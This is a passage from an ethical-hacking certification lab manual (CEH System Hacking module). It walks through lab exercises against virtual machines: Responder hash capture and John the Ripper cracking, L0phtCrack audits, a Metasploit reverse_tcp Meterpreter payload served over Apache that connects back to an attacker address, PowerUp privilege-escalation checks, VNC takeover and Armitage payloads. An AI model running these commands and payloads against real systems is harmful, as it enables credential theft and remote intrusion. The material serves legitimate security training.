CEH Lab Manual
Module 06 - System Hacking
CEH Lab Manual Page 495

System Hacking

System hacking is the process of testing computer systems and software for security vulnerabilities that an attacker could exploit to gain access to the organization's systems and steal or misuse sensitive information.

Lab Scenario

Since security and compliance are high priorities for most organizations, attacks on an organization's computer systems take many different forms, such as spoofing, smurfing, and other types of Denial-of-Service (DoS) attacks. These attacks are designed to harm or interrupt the use of operational systems.

Earlier, you gathered all possible information about the target through techniques such as footprinting, scanning, enumeration, and vulnerability analysis. In the first step (footprinting) of the security assessment and penetration testing of your organization, you collected open-source information about your organization. In the second step (scanning), you collected information about open ports and services, OSes, and any configuration lapses. In the third step (enumeration), you collected information about NetBIOS names, shared network resources, policy and password details, users and user groups, routing tables, and audit and service settings. In the fourth step (vulnerability analysis), you collected information about network vulnerabilities, application and service configuration errors, applications installed on the target system, accounts with weak passwords, and files and folders with weak permissions.

Now, the next step for an ethical hacker or a penetration tester is to perform system hacking on the target system using all the information collected in the earlier phases. System hacking is one of the most important steps and is performed after acquiring information through the above techniques.
This information can be used to hack the target system using various hacking techniques and strategies. System hacking helps to identify vulnerabilities and security flaws in the target system and predict the effectiveness of additional security measures in strengthening and protecting information resources and systems from attack.

The labs in this module will provide you with real-time experience in exploiting underlying vulnerabilities in target systems using various online sources and system hacking techniques and tools. However, system hacking activities may be illegal depending on the organization's policies and any laws that are in effect. As an ethical hacker or pen tester, you should always acquire proper authorization before performing system hacking.

Lab Objectives

The objective of this lab is to monitor a target system remotely and perform other tasks that include, but are not limited to:

- Bypassing access controls to gain access to the system (such as password cracking and vulnerability exploitation)
- Acquiring the rights of another user or an admin (privilege escalation)
- Creating and maintaining remote access to the system (executing applications such as trojans, spyware, backdoors, and keyloggers)
- Hiding malicious activities and data theft (executing applications such as rootkits, steganography, etc.)
- Hiding the evidence of compromise (clearing logs)

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Lab Environment

Tools demonstrated in this lab are available in E:\CEH-Tools\CEHv11 Module 06 System Hacking.

To carry out this lab, you need:
- Windows 10 virtual machine
- Windows Server 2019 virtual machine
- Windows Server 2016 virtual machine
- Parrot Security virtual machine
- Ubuntu virtual machine
- Web browsers with an Internet connection
- Administrator privileges to run the tools

Lab Duration

Time: 205 Minutes

Overview of System Hacking

In preparation for hacking a system, you must follow a certain methodology. You need to first obtain information during the footprinting, scanning, enumeration, and vulnerability analysis phases, which can then be used to exploit the target system. There are four steps in system hacking:

- Gaining Access: Use techniques such as cracking passwords and exploiting vulnerabilities to gain access to the target system.
- Escalating Privileges: Exploit known vulnerabilities existing in OSes and software applications to escalate privileges.
- Maintaining Access: Maintain high levels of access to perform malicious activities such as executing malicious applications and stealing, hiding, or tampering with sensitive system files.
- Clearing Logs: Avoid recognition by legitimate system users and remain undetected by wiping out the entries corresponding to malicious activities in the system logs.

Lab Tasks

Ethical hackers or pen testers use numerous tools and techniques to hack target systems. Recommended labs that will assist you in learning various system hacking techniques include:

1. Gain Access to the System
   1.1 Perform Active Online Attack to Crack the System's Password using Responder
   1.2 Audit System Passwords using L0phtCrack
   1.3 Find Vulnerabilities on Exploit Sites
   1.4 Exploit Client-Side Vulnerabilities and Establish a VNC Session
   1.5 Gain Access to a Remote System using Armitage
   1.6 Hack a Windows Machine with a Malicious Office Document using TheFatRat
   1.7 Perform Buffer Overflow Attack to Gain Access to a Remote System
2. Perform Privilege Escalation to Gain Higher Privileges
   2.1 Escalate Privileges using Privilege Escalation Tools and Exploit Client-Side Vulnerabilities
   2.2 Hack a Windows Machine using Metasploit and Perform Post-Exploitation using Meterpreter
3. Maintain Remote Access and Hide Malicious Activities
   3.1 User System Monitoring and Surveillance using Power Spy
   3.2 User System Monitoring and Surveillance using Spytech SpyAgent
   3.3 Hide Files using NTFS Streams
   3.4 Hide Data using White Space Steganography
   3.5 Image Steganography using OpenStego
   3.6 Covert Channels using Covert_TCP
4. Clear Logs to Hide the Evidence of Compromise
   4.1 View, Enable, and Clear Audit Policies using Auditpol
   4.2 Clear Windows Machine Logs using Various Utilities
   4.3 Clear Linux Machine Logs using the BASH Shell
   4.4 Clear Windows Machine Logs using CCleaner

Remark

EC-Council has prepared a considerable amount of lab exercises for students to practice during the 5-day class and at their free time to enhance their knowledge and skills.

*Core - Lab exercise(s) marked under Core are recommended by EC-Council to be practiced during the 5-day class.

**Self-study - Lab exercise(s) marked under Self-study are for students to practice at their free time. Steps to access the additional lab exercises can be found in the first page of the CEHv11 volume 1 book.

***iLabs - Lab exercise(s) marked under iLabs are available in our iLabs solution.
iLabs is a cloud-based virtual lab environment preconfigured with vulnerabilities, exploits, tools and scripts, and can be accessed from anywhere with an Internet connection. If you are interested to learn more about our iLabs solution, please contact your training center or visit https://ilabs.eccouncil.org.

Lab Analysis

Analyze and document the results related to this lab exercise. Give your opinion on the target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB

Gain Access to the System

Gaining access refers to the process of obtaining unauthorized access to the target system to modify or steal sensitive information.

Lab Scenario

For a professional ethical hacker or pen tester, the first step in system hacking is to gain access to a target system using the information obtained and the loopholes found in the system's access control mechanism. In this step, you will use various techniques such as password cracking, vulnerability exploitation, and social engineering to gain access to the target system.

Password cracking is the process of recovering passwords from the data transmitted by a computer system or stored in it. It may help a user recover a forgotten or lost password or act as a preventive measure by system administrators to check for easily breakable passwords; however, an attacker can use this process to gain unauthorized system access.

Password cracking is one of the crucial stages of system hacking. Hacking often begins with password-cracking attempts. A password is a key piece of information necessary to access a system.
Consequently, most attackers use password-cracking techniques to gain unauthorized access. An attacker may either crack a password manually by guessing it or use automated tools and techniques such as the dictionary or brute-force method. Most password cracking techniques are successful because of weak or easily guessable passwords.

Vulnerability exploitation involves the execution of multiple complex, interrelated steps to gain access to a remote system. Attackers use discovered vulnerabilities to develop exploits, then deliver and execute the exploits on the remote system.

The labs in this exercise demonstrate how easily hackers can gather password information from your network and show the password vulnerabilities that exist in computer networks.

Lab Objectives

- Perform active online attack to crack the system's password using Responder
- Audit system passwords using L0phtCrack
- Find vulnerabilities on exploit sites
- Exploit client-side vulnerabilities and establish a VNC session
- Gain access to a remote system using Armitage
- Hack a Windows machine with a malicious Office document using TheFatRat
- Perform buffer overflow attack to gain access to a remote system

Lab Environment

To carry out this lab, you need:

- Windows 10 virtual machine
- Windows Server 2016 virtual machine
- Parrot Security virtual machine
- Ubuntu virtual machine
- Web browsers with an Internet connection
- Administrator privileges to run the tools
- L0phtCrack located at E:\CEH-Tools\CEHv11 Module 06 System Hacking\Password Cracking Tools\L0phtCrack
- You can also download the latest version of L0phtCrack from its official website. If you decide to download the latest version, the screenshots shown in the lab might differ from what you see on your screen.
Lab Duration

Time: 100 Minutes

Overview of Gaining Access

The previous phases of hacking such as footprinting and reconnaissance, scanning, enumeration, and vulnerability assessment help identify security loopholes and vulnerabilities that exist in the target organization's IT assets. You can use this information to gain access to the target organization's systems. You can use various techniques such as password cracking and vulnerability exploitation to gain access to the target system.

TASK 1: Perform Active Online Attack to Crack the System's Password using Responder

Here, we will use the Responder tool to extract information such as the target system's OS version, client version, NTLM client IP address, and NTLM username and password hash.

Note: In this task, we will use the Ubuntu (10.10.10.9) virtual machine as the host machine and the Windows 10 (10.10.10.10) virtual machine as the target machine.

LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows OSes that are used to perform name resolution for hosts present on the same link. These services are enabled by default in Windows OSes and can be used to extract the password hashes from a user. By listening for LLMNR/NBT-NS broadcast requests, an attacker can spoof the server and send a response claiming to be the legitimate server. After the victim system accepts the connection, it is possible to gain the victim's user credentials by using a tool such as Responder.

1. Turn on the Ubuntu and Windows 10 virtual machines.
2. In the Ubuntu virtual machine, click on the Ubuntu button to log in.
3. In the Password field, type toor and press Enter to sign in.
4. In the left pane, under the Activities list, scroll down and click the Terminal icon to open the Terminal window.
5. A Terminal window appears. In the Terminal window, type git clone https://github.com/SpiderLabs/Responder and press Enter to install the Responder tool.

Figure 1.1.4: Cloning the Responder tool

Note: You can also access the tool repository from the CEH-Tools folder available in the Windows 10 virtual machine, in case the GitHub link does not exist or you are unable to clone the tool repository. Follow the steps below in order to access the CEH-Tools folder from the Ubuntu virtual machine:

- Click on Files in the left-hand pane of the Desktop. The Home window appears; click on + Other Locations in the left-hand pane of the window.
- The + Other Locations window appears; type smb://10.10.10.10 in the Connect to Server field and click the Connect button.
- A security pop-up appears. Type the Windows 10 virtual machine credentials (Username: Admin and Password: Pa$$w0rd) and click the Connect button.
- A window appears, displaying the Windows 10 shared folder; double-click the CEH-Tools folder.

Responder is an LLMNR, NBT-NS and MDNS poisoner.
It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix; by default, the tool only responds to a File Server Service request, which is for SMB.

- Navigate to CEHv11 Module 06 System Hacking\GitHub Tools and copy the Responder folder.
- Paste the Responder folder in the Home directory.

6. Now, switch to the Windows 10 virtual machine and log in with Username: Jason and Password: qwerty.

Figure 1.1.11: Login as Jason

7. Switch back to the Ubuntu virtual machine. In the Terminal window, type cd Responder and press Enter to navigate to the Responder tool folder.

Note: If you get logged out of Ubuntu, then double-click on the screen, enter the password toor, and press Enter.

8. Type chmod +x Responder.py and press Enter to grant execute permission to the Responder.py script.
9. Now, type sudo ./Responder.py -I ens33 and press Enter. In the [sudo] password for ubuntu field, type toor and press Enter to run the Responder tool.

Note: The password that you type will not be visible.

Note: -I specifies the interface (here, ens33). The interface name might differ in your lab environment; run ip a on the Ubuntu machine to list its interfaces.
10. Responder starts listening on the network interface for events, as shown in the screenshot.

Figure 1.1.13: Responder listening

11. Switch to the Windows 10 virtual machine, right-click on the Start icon, and click Run.
12. The Run window appears; type \\CEH-Tools in the Open field and click OK.

Note: CEH-Tools is a single-label name with no DNS record, so Windows falls back to LLMNR and NBT-NS to resolve it. Responder answers that query with its own address, and the Windows 10 machine then authenticates to Responder over SMB with Jason's NTLMv2 credentials; that authentication is the hash captured in the following steps.

13. Leave the Windows 10 virtual machine running and switch back to the Ubuntu virtual machine.
14. Responder starts capturing the access logs of the Windows 10 virtual machine. It collects the hashes of the logged-in user of the target machine, as shown in the screenshot.

Figure 1.1.16: Hash obtained by Responder

15. By default, Responder stores the logs in Home/Responder/logs. Navigate to the same location and double-click the SMB-NTLMv2-SSP-10.10.10.10.txt file.
16. A log file appears, displaying the hashes recorded from the target system user, as shown in the screenshot.

Figure 1.1.17: Responder logs

17. Now, attempt to crack the hashes to learn the password of the logged-in user (here, Jason).
18. To crack the password hash, the John the Ripper tool must be installed on your system.
To install the tool, open a new Terminal window, type sudo snap install john-the-ripper, and press Enter.
19. In the [sudo] password for ubuntu field, type toor and press Enter to install the John the Ripper tool.
20. After completing the installation of John the Ripper, type sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt and press Enter.

Note: The log file name will differ in your lab environment. Here, the log file name is SMB-NTLMv2-SSP-10.10.10.10.txt.

21. John the Ripper starts cracking the password hashes and displays the password in plain text, as shown in the screenshot.

Figure 1.1.18: Password cracked successfully

22. This concludes the demonstration of performing an active online attack to crack a password using Responder.
23. Close all open windows and document all the acquired information.
24. Turn off the Ubuntu virtual machine.
25. Close all windows on the Windows 10 virtual machine. Click the Start icon in the bottom left-hand corner of the Desktop, click the user icon, and click Sign out. You will be signed out from Jason's account.

TASK 2: Audit System Passwords using L0phtCrack

L0phtCrack is a tool designed to audit passwords and recover applications. It recovers Microsoft Windows passwords with the help of dictionary, hybrid, rainbow table and brute-force attacks.

In this lab, as an ethical hacker or penetration tester, you will be running the L0phtCrack tool by providing it with the remote machine's administrator user credentials. User account passwords that are cracked in a short amount of time are weak, meaning that you need to take certain measures to strengthen them.

Here, we will audit system passwords using L0phtCrack.

Task 2.1: Install and Configure L0phtCrack

1. Launch the Windows 10 and Windows Server 2016 virtual machines.
2. Switch to the Windows 10 virtual machine and log in with the credentials Admin and Pa$$w0rd.
3. Navigate to E:\CEH-Tools\CEHv11 Module 06 System Hacking\Password Cracking Tools\L0phtCrack and double-click lc7setup_v7.1.5_Win64.exe.

Note: If a User Account Control pop-up appears, click Yes.

4. L0phtCrack starts loading; once the loading completes, the L0phtCrack Setup window appears; click Next.

Figure 1.2.2: L0phtCrack Setup wizard

5. Follow the wizard-driven installation steps to install L0phtCrack.
6. After completing the installation, the Completing L0phtCrack 7 Setup wizard appears. Ensure that the Run L0phtCrack 7 checkbox is selected and click Finish.

Note: The L0phtCrack version might differ in your lab environment.

7. The L0phtCrack 7 - Trial pop-up appears; click the Proceed With Trial button.

Note: If an Update Available pop-up window appears, click Skip This Update.

8. In the next window, click the Password Auditing Wizard button.

Figure 1.2.4: Start Password Auditing wizard

9. The LC7 Password Auditing Wizard window appears; click Next.
Figure 1.2.5: Password Auditing wizard window

10. In the Choose Target System Type wizard, ensure that the Windows radio button is selected and click Next.

Figure 1.2.6: Choose target system type option

11. In the Windows Import wizard, select the A remote machine radio button and click Next.

Figure 1.2.7: Windows import option

12. In the Windows Import From Remote Machine (SMB) wizard, type in the details below:
   - Host: 10.10.10.16 (IP address of the remote machine [Windows Server 2016])
   - Select the Use Specific User Credentials radio button.
   - In the Credentials section, type the login credentials of the Windows Server 2016 virtual machine (Username: Administrator; Password: Pa$$w0rd).
   - If the machine is under a domain, enter the domain name in the Domain section. Here, Windows Server 2016 belongs to the CEH.com domain.
13. Once you have entered all the required details in the fields, click Next to proceed.

Figure 1.2.8: Windows import from remote machine (SMB)

14. In the Choose Audit Type wizard, select the Thorough Password Audit radio button and click Next.

Figure 1.2.9: Choose the audit type section of the LC7 wizard

15. In the Reporting Options wizard, select the Generate Report at End of Auditing option and ensure that the CSV report type radio button is selected. Click the Browse... button to store the report in the desired location.

Figure 1.2.10: Reporting options

16. The Choose report file name window appears; select the desired location (here, Desktop) and click Save.
17. In the Reporting Options wizard, the selected location to save the file appears under the Report File Location field; click Next.
18. The Job Scheduling wizard appears. Ensure that the Run this job immediately radio button is selected and click Next.

Figure 1.2.13: Job scheduling option

19. Check the given details in the Summary wizard and click Finish.

Figure 1.2.14: Summary option

20. L0phtCrack starts cracking the passwords of the remote machine. In the lower-right corner of the window, you can see the status, as shown in the screenshot.

Figure 1.2.15: Cracking passwords in progress

Task 2.2: Analyze the Result

21. After the status bar completes, L0phtCrack displays the cracked passwords of the users that are available on the remote machine, as shown in the screenshot.

Note: It will take some time to crack all the passwords of a remote system.

22. After successfully obtaining the weak and strong passwords, as shown in the screenshot, you can click the Stop button in the bottom-right corner of the window.
Figure 1.2.16: Passwords successfully cracked

23. As an ethical hacker or penetration tester, you can use the L0phtCrack tool for auditing the system passwords of machines in the target network and later enhance network security by implementing a strong password policy for any systems with weak passwords.
24. This concludes the demonstration of auditing system passwords using L0phtCrack.
25. Close all open windows and document all the acquired information.
26. Turn off the Windows Server 2016 virtual machine.

TASK 3: Find Vulnerabilities on Exploit Sites

Here, we attempt to find the vulnerabilities of the target system using various exploit sites such as Exploit DB and SecurityFocus.

Exploit sites such as the Exploit Database hold exploits for various OSes, devices and applications. You can use these sites to find relevant vulnerabilities in the target system based on the information gathered in the earlier phases, download the exploit from the site, and use exploitation tools such as Metasploit to gain access.

Task 3.1: Finding Vulnerabilities on Exploit DB

1. On the Windows 10 virtual machine, open any web browser (here, Mozilla Firefox) and navigate to https://www.exploit-db.com.
2. The Exploit Database website appears; you can click any of the latest vulnerabilities to view detailed information, or you can search for a specific vulnerability by entering its name in the Search field.
3. Click on the menu icon in the top-left corner of the website and select the SEARCH EDB option from the list to perform an advanced search.

Figure 1.3.2: Select SEARCH EDB option
4. The Exploit Database Advanced Search page appears. In the Type field, select any type from the drop-down list (here, remote). Similarly, in the Platform field, select any OS (here, Windows_x86-64). Click Search.

Note: Here, you can perform an advanced search by selecting various search filters to find a specific vulnerability.

Figure 1.3.3: Exploit Database Advanced Search page

5. Scroll down to view the result, which displays a list of vulnerabilities, as shown in the screenshot.
6. You can click on any vulnerability to view its detailed information (here, CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)).

Figure 1.3.4: List of vulnerabilities

7. Detailed information regarding the selected vulnerability such as CVE ID, author, type, platform, and published date is displayed, as shown in the screenshot.
8. Click the download icon to download the exploit code.

Figure 1.3.5: Vulnerability information

9. The Opening file pop-up appears; select the Save File radio button and click OK to download the exploit file.
10. Navigate to the download location (here, Downloads), right-click the saved file, and select Edit with Notepad++.
11. A Notepad++ window appears, displaying the exploit code, as shown in the screenshot.

Figure 1.3.6: Exploit code

12. This exploit code can further be used to exploit vulnerabilities in the target system.

Note: Read any downloaded exploit before running it. Check the vulnerable version and platform it was written for against what you enumerated, and inspect the shellcode and any hard-coded addresses or connect-back hosts; public exploit code is unaudited and may not match your target.

13. Close the web browser.

Task 3.2: Finding Vulnerabilities on SecurityFocus

14. Similarly, you can search vulnerabilities and download their exploits from the SecurityFocus website.
15. Open any web browser (here, Mozilla Firefox) and navigate to https://www.securityfocus.com.
16. The SecurityFocus website appears; click the Search all vulnerabilities link at the bottom of the page to search vulnerabilities by CVE number or by vendor, title, or version.

Figure 1.3.7: SecurityFocus website

17. A new webpage displaying a list of vulnerabilities appears. Click on any vulnerability available on the site and look at the data about the exploit.
The area to focus on is the exploit section, accessed by clicking on the exploit tab of the vulnerability.

Figure 1.3.8: Detailed information about the vulnerability

18. Now, navigate back to the Vulnerabilities search page. Here, search for the vulnerability CVE-2013-4627 by entering its CVE number in the Search by CVE field. After entering the CVE ID, click the Submit button or press Enter.

You can similarly use other exploit sites such as VulDB (https://vuldb.com), MITRE CVE (https://cve.mitre.org), Vulners (https://vulners.com) and CIRCL CVE Search (https://cve.circl.lu) to find target system vulnerabilities.

Note: The SecurityFocus site and its BugTraq database have since been retired, so this part of the task may not be reproducible; the CVE-based sites listed above serve the same purpose.

19. A result page appears, displaying the name of the searched vulnerability with its URL link, as shown in the screenshot.

Figure 1.3.9: Searched vulnerability

20. Click on the vulnerability URL. A detailed description of the searched vulnerability appears; click on the exploit tab to see the available exploit script.
21. You can further click the link to the Python script that represents the exploit to view the exploit code and later use the same script to attempt an attack on the target system. This code can be used manually or can be placed into a tool.

Figure 1.3.10: Advantech Studio and InduSoft Web Studio 'NTWebServer.exe' Directory Traversal exploit (56871.py)

22. Close the web browser.
This concludes the demonstration of finding vulnerabilities on exploit sites such as Exploit Database and SecurityFocus.
24. Close all open windows and document all the acquired information.

TASK 4: Exploit Client-Side Vulnerabilities and Establish a VNC Session

This lab demonstrates the exploitation procedure applied to a weakly patched Windows 10 machine that allows you to gain remote access to it through a remote desktop connection. Here, we will see how attackers can exploit vulnerabilities in target systems to establish unauthorized VNC sessions using Metasploit and remotely control these targets.

Note: In this task, we will use the Parrot Security (10.10.10.13) virtual machine as the host system and the Windows 10 (10.10.10.10) virtual machine as the target system.

1. Turn on the Parrot Security virtual machine.
… LPORT=444 -o /root/Desktop/Test.exe and press Enter.
Note: Here, the IP address of the host machine is 10.10.10.13 (Parrot Security virtual machine).
8. This will generate Test.exe, a malicious file, on the Desktop, as shown in the screenshot.
Note: To navigate to the Desktop folder, click Places from the top section of the Desktop and click Home Folder from the drop-down options. In the attacker window, click File System from the left pane and navigate to the location /root/Desktop.

Figure 1.4.5: Malicious file generated

Task 4.2: Create Directory to Share Exploit
9. Now, create a directory to share this file with the target machine, provide the permissions, and copy the file from the Desktop to the shared location using the below commands:
   - Type mkdir /var/www/html/share and press Enter to create a shared folder
   - Type chmod -R 755 /var/www/html/share and
press Enter
   - Type chown -R www-data:www-data /var/www/html/share and press Enter
   - Copy the malicious file to the shared location by typing cp /root/Desktop/Test.exe /var/www/html/share and pressing Enter
Note: Here, we are sending the malicious payload through a shared directory; in a real engagement, it could instead be sent as an email attachment or through physical means such as a hard drive or pen drive.

Task 4.3: Launch Metasploit
10. Now, start the Apache service. To do this, type service apache2 start and press Enter.
11. Type msfconsole and press Enter to launch the Metasploit framework.
12. In msfconsole, type use exploit/multi/handler and press Enter.

Task 4.4: Set the Payload
13. Now, set the payload, LHOST, and LPORT. To do so, use the below commands:
   - Type set payload windows/meterpreter/reverse_tcp and press Enter
   - Type set LHOST 10.10.10.13 and press Enter
   - Type set LPORT 444 and press Enter
   The payload type and LPORT must be exactly the ones used when Test.exe was generated (reverse_tcp, port 444); if they differ, the executable will call back to a port nothing is listening on and no session appears.
14. After entering the above details, type exploit and press Enter to start the listener.
15. Leave the Parrot Security virtual machine running.

Task 4.5: Run Exploit
16. Switch to the Windows 10 virtual machine.
17. Open any web browser (here, Mozilla Firefox). In the address bar, type http://10.10.10.13/share and press Enter. As soon as you press Enter, it will display the shared folder contents, as shown in the screenshot.
18. Click Test.exe to download the file.
Note: 10.10.10.13 is the IP address of the host machine (here, the Parrot Security virtual machine).
[Screenshot: Index of /share listing Test.exe (72K) served by Apache at 10.10.10.13 port 80]

19. Once you click on the Test.exe file, the Opening Test.exe pop-up appears; select Save File.
20. The malicious file will download to the browser's default download location (here, Downloads). Now, navigate to this location and double-click the Test.exe file to run it.

Figure 1.4.11: Malicious file successfully downloaded

21. The Open File - Security Warning window appears ("The publisher could not be verified. Are you sure you want to run this software?", Name: C:\Users\Admin\Downloads\Test.exe, Publisher: Unknown Publisher); click Run.

Figure 1.4.12: Security warning on executing the exe file

22. Leave the Windows 10 virtual machine running, so that the Test.exe file runs in the background, and switch to the Parrot Security virtual machine.
23. Observe that one session has been created or opened in the Meterpreter shell, as shown in the screenshot.

Figure 1.4.13: Meterpreter shell access obtained

24. Type sysinfo and press Enter to verify that you have hacked the target Windows 10.
Note: If the Meterpreter shell is not automatically connected to the session, type sessions -i 1 and press Enter to open a session in the Meterpreter shell.

Task 4.7: Find Misconfigurations in the Target System
25. Now, open another Parrot Terminal and navigate to the root directory.
26. In the Terminal window, type git clone https://github.com/PowerShellMafia/PowerSploit and press Enter.
The PowerSploit repository is downloaded to the root directory.

Note: You can also access the tool repository from the CEH-Tools folder available in the Windows 10 virtual machine, in case the GitHub link does not exist or you are unable to clone the tool repository. Follow the steps below in order to access the CEH-Tools folder from the Parrot Security virtual machine:
   - Open any explorer window and press Ctrl+L. The Location field appears; type smb://10.10.10.10 and press Enter to access the Windows 10 shared folders.
   - The security pop-up appears; enter the Windows 10 virtual machine credentials (Username: Admin and Password: Pa$$w0rd) and click Connect.
   - The Windows shares on 10.10.10.10 window appears; navigate to the location CEH-Tools\CEHv11 Module 06 System Hacking\GitHub Tools\ and copy the PowerSploit folder.
   - Paste the copied PowerSploit folder in the location /home/attacker/.
   - In the terminal window, type mv /home/attacker/PowerSploit /root/ and press Enter.

27. Now, switch back to the Terminal window with an active Meterpreter session. Type upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1 and press Enter. This command uploads the PowerSploit file (PowerUp.ps1) to the target system's present working directory.

Figure 1.4.16: Upload file to the target

28. Type shell and press Enter to open a shell session. Observe that the present working directory points to the Downloads folder in the system.
29. Type powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks" and press Enter to run the PowerUp.ps1 script. The checks run with the rights of the account that launched Test.exe, so every finding is relative to what that account can write or modify.
Note: PowerUp.ps1 is a program that enables a user to perform quick checks against a Windows machine for any privilege escalation opportunities.
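As an added example, not part of the manual and not PowerSploit's code, the shell script below reproduces the core rule of PowerUp's unquoted service path check over constructed service data, then lists the executable paths the Service Control Manager would try before the real binary, which is what makes such a service exploitable. Service names and paths are invented for the demo; on a real target the input lines would come from the output of `wmic service get name,pathname` or `sc qc`, run from the shell opened in step 28.

```shell
#!/bin/sh
# Added example, not from the CEH manual or PowerSploit: the core rule behind
# PowerUp's unquoted service path check, plus the hijack locations it implies.
# Runs offline on constructed data; on a real target the input lines would
# come from e.g.  wmic service get name,pathname  (one "name|path" per line).
set -eu

# Constructed sample services, "<name>|<binary path>" one per line.
# Service names and paths are invented for the demo.
SAMPLE_SERVICES='VulnSvc|C:\Program Files\Vuln App\service.exe -run
SafeSvc|"C:\Program Files\Safe App\service.exe"
Spooler|C:\Windows\System32\spoolsv.exe
NoSpace|C:\Tools\svc.exe'

# Read "<name>|<path>" lines on stdin; print "<name>|<exe>" for each service
# whose executable path contains a space, is not quoted, and is not under
# C:\Windows (those directories are not writable by a normal user, so they
# are noise rather than an escalation opportunity).
unquoted_service_paths() {
  awk -F'|' '
    {
      name = $1; exe = $2
      i = index(tolower(exe), ".exe")        # drop arguments after the binary
      if (i > 0) exe = substr(exe, 1, i + 3)
      if (substr(exe, 1, 1) == "\"") next    # quoted: not vulnerable
      if (index(exe, " ") == 0) next         # no space: nothing to split on
      if (tolower(substr(exe, 1, 11)) == "c:\\windows\\") next
      print name "|" exe
    }'
}

# For one unquoted path, print the executables the Service Control Manager
# tries before the real one: each space-delimited prefix with ".exe" appended.
# Dropping a binary at any writable one of these runs it as the service account.
hijack_candidates() {
  printf '%s\n' "$1" | awk '
    {
      n = split($0, parts, " ")
      prefix = parts[1]
      for (i = 2; i <= n; i++) {
        print prefix ".exe"
        prefix = prefix " " parts[i]
      }
    }'
}

# Run the check over the sample and print each finding with its hijack paths.
report() {
  printf '%s\n' "$SAMPLE_SERVICES" | unquoted_service_paths | while IFS='|' read -r name exe; do
    echo "[!] $name: unquoted path \"$exe\""
    hijack_candidates "$exe" | sed 's/^/    candidate: /'
  done
}
```

Calling `report` flags only VulnSvc and lists C:\Program.exe and C:\Program Files\Vuln.exe as the planting locations; whether either directory is writable by the current user is the second half of the check, which PowerUp performs with an ACL lookup and which is deliberately left out here because it needs a live Windows host.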
PowerUp utilizes various service abuse checks, .dll hijacking opportunities, registry checks, etc. to enumerate common elevation methods for a target system.

30. A result appears, displaying vulnerabilities in unquoted service paths, service executables, argument permissions, DLL locations, service permissions, unattended install files, and other locations.

Figure 1.4.19: Service executable and argument permissions

Figure 1.4.20: Potentially hijackable DLL locations

Note: Attackers exploit misconfigured services such as unquoted service paths, service object permissions, unattended installs, modifiable registry autoruns and configurations, and other locations to elevate access privileges. After establishing an active session using Metasploit, attackers use tools such as PowerSploit to detect misconfigured services that exist in the target OS.

31. Now, type exit and press Enter to return to the Meterpreter session.

Task: Open VNC Session
32. Now, use the existing Meterpreter session to start a VNC server on the Windows 10 virtual machine and gain remote desktop access to it. To do so, type run vnc and press Enter.

Figure 1.4.21: Opening a VNC session through Meterpreter

33. This will open a VNC session for the target machine, as shown in the screenshot. Using it, you can see the victim's activities on the system, including the files, websites, software, and other resources the user opens or runs.

Note: Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Figure 1.4.22: Victim's system accessed through the VNC session

34.
This concludes the demonstration of how to exploit client-side vulnerabilities and establish a VNC session using Metasploit.
35. Close all open windows and document all the acquired information.

TASK 5: Gain Access to a Remote System using Armitage

Here, we will use the Armitage tool to gain access to the remote target machine.

Note: In this task, we will use the Parrot Security (10.10.10.13) virtual machine as the host system and the Windows 10 (10.10.10.10) virtual machine as the target system. Before starting this task, restart the Windows 10 virtual machine and log in with the credentials Admin and Pa$$w0rd.

1. On the Parrot Security virtual machine, click the MATE Terminal icon at the top of the Desktop to open the Parrot Terminal.
2. The Parrot Terminal window appears. In the Terminal window, type sudo su and press Enter to run the programs as a root user.
3. In the [sudo] password for attacker field, type toor as the password and press Enter.
Note: The password that you type will not be visible.
4. Now, type cd and press Enter to jump to the root directory.
5. In the terminal window, type service postgresql start and press Enter to start the database service that Metasploit and Armitage use.

Task 5.1: Launch Armitage
6. Click Applications in the top-left corner of the Desktop and navigate to Pentesting > Exploitation Tools > Metasploit Framework > armitage to launch the Armitage tool.
7. A security pop-up appears asking for your password to perform administrative tasks; enter toor and click OK.
8. The Connect pop-up appears; leave the settings at their defaults (host 127.0.0.1) and click the Connect button.
9. The Start Metasploit? pop-up appears; click Yes.
10. The Progress pop-up appears.
After the loading completes, the Armitage main window appears, as shown in the screenshot.

Task 5.2: Scan the Target
11. Click Hosts from the menu bar and navigate to Nmap Scan > Intense Scan to scan for live hosts in the network.

[Screenshot: Armitage Hosts menu (Import Hosts, Add Hosts, Nmap Scan, Clear Database) with the Nmap Scan submenu: Intense Scan, Intense Scan + UDP, Intense Scan all TCP ports, Intense Scan no ping, Ping Scan, Quick Scan, Quick Scan (OS detect), Comprehensive]

12. The Input pop-up appears ("Enter scan range (e.g., 192.168.1.0/24)"). Type the target IP address (here, 10.10.10.10) and click OK.

Figure 1.5.7: Input pop-up

13. After the scan completes, a Message pop-up appears displaying "Scan Complete! Use Attacks->Find Attacks to suggest applicable exploits for your targets."; click OK.

Figure 1.5.8: Message pop-up

14. Observe that the target host (10.10.10.10) appears on the screen, as shown in the screenshot.
Note: As it is known from the Intense scan that the target host is running a Windows OS, the Windows OS logo also appears in the host icon.

Task 5.3: Send Payload
15. Now, from the left-hand pane, expand the payload node, navigate to windows > meterpreter, and double-click reverse_tcp.
16. The windows/meterpreter/reverse_tcp window appears.
Scroll down to the LPORT option and change the port value to 444. In the Output field, select exe from the drop-down options; click Launch.

Figure 1.5.11: windows/meterpreter/reverse_tcp (Windows Meterpreter Shell, Reverse TCP Inline: "Connect back to attacker and spawn a Meterpreter shell"; LHOST 10.10.10.13)

17. The Save window appears. Select Desktop as the location, set the File Name as malicious_payload.exe, and click the Save button.

Figure 1.5.12: Save the file

18. A Message pop-up appears; click OK.
19. Now, switch to the Terminal window, type cp /root/Desktop/malicious_payload.exe /var/www/html/share/, and press Enter to copy the file to the shared folder.
20. Type service apache2 start and press Enter to start the Apache server.

Figure 1.5.13: Copy the file to the shared folder

21. Now, in the left-hand pane, double-click meterpreter > reverse_tcp again.
